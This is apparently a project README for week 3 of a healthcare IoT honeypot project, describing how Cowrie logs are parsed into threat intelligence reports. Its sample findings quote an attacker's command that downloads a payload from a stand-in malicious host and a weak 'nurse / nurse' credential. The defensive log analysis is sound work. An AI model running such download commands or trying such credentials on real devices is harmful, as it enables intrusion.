🛡️ Week 3 — Log Parsing and Threat Intelligence Extraction
📌 Week 3 Overview
Week 3 focuses on transforming raw Cowrie honeypot logs into actionable cybersecurity intelligence.

After successfully deploying and exposing the healthcare IoT honeypot in Weeks 1 and 2, this phase targets data engineering and threat analysis. The objective is to parse large JSON/text logs generated by Cowrie, extract Indicators of Compromise (IoCs), identify attacker behavior patterns, and prepare structured threat intelligence for visualization in Week 4.

🎯 Week 3 Objectives
Primary Goals:
Parse Cowrie JSON logs using Python
Extract attacker IP addresses
Identify brute-force attempts
Detect successful login attempts
Extract executed terminal commands
Identify malware download attempts
Generate CSV/JSON intelligence reports
Prepare structured datasets for dashboarding
🏗️ Week 3 Architecture
                 Cowrie Honeypot Logs
                        |
                        v
             data/logs/cowrie/cowrie.json
                        |
                        v
              Python Log Parsing Engine
             (cowrie_parser.py)
                        |
                        v
        +----------------------------------+
        | Threat Intelligence Extraction   |
        |----------------------------------|
        | - Source IPs                     |
        | - Failed logins                  |
        | - Successful logins              |
        | - Commands entered               |
        | - Malware URLs                   |
        +----------------------------------+
                        |
                        v
              Processed Security Outputs
                        |
        +----------------------------------+
        | CSV / JSON Reports               |
        |----------------------------------|
        | attack_summary.csv               |
        | ioc_report.json                  |
        | malware_hashes.csv               |
        | executed_commands.csv            |
        +----------------------------------+
📁 Week 3 Important Files
logging/parsers/cowrie_parser.py

data/processed/
├── parsed_cowrie_logs.json
├── attack_summary.csv
├── ioc_report.json
├── malware_hashes.csv
└── executed_commands.csv

analysis/reports/
└── Week3_Threat_Intelligence_Report.md
🛠️ Core Technologies Used
Python
JSON Parsing
CSV Export
Cowrie Honeypot Logs
Regex / IoC Detection
🚀 Commands Used
Run Cowrie Parser:
python3 logging/parsers/cowrie_parser.py
View Parsed JSON:
cat data/processed/parsed_cowrie_logs.json
View CSV Summary:
cat data/processed/attack_summary.csv
🔍 Key Indicators of Compromise (IoCs) Extracted
Examples:
Attacker IP addresses
Failed credential attempts
Successful weak credential logins
wget malware download attempts
curl payload execution
Command injection patterns
📊 Sample Findings
Brute Force:
192.168.100.1 → 6 failed login attempts
Command Injection:
wget http://malicious-site.com/payload.sh
Credential Theft:
nurse / nurse
📸 Week 3 Screenshot Checklist
Required:
W3_01_Cowrie_JSON_Parsing.png
W3_02_Attack_Summary_CSV.png
W3_03_IOC_Extraction_Report.png
W3_04_Malware_Hash_Output.png
W3_05_Executed_Commands_Report.png
📄 Deliverables
Successfully Produced:

✔ Parsed honeypot logs
✔ Threat intelligence reports
✔ IoC extraction
✔ Malware attempt detection
✔ Structured CSV datasets
✔ Dashboard-ready data

🔒 Security Value

Week 3 transforms simple honeypot logs into practical security intelligence that can help:

Detect attacker behavior
Understand exploit trends
Improve healthcare IoT defense
Support compliance reporting
